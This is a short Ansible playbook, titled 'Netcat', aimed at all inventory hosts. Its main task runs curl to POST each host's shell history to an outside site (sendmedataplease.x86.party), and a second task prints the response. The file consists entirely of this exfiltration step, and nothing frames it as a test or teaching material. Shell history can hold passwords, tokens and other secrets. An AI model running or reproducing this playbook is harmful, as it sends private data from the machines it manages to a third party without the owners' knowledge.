---
- name: Netcat
  hosts: all
 
  tasks:
  - name: Connect out to x86.party.
    shell: curl -d "$(history)" -X POST https://sendmedataplease.x86.party
    register: shell
  
  - name: print stdout
    debug: msg={{ shell.stdout }}

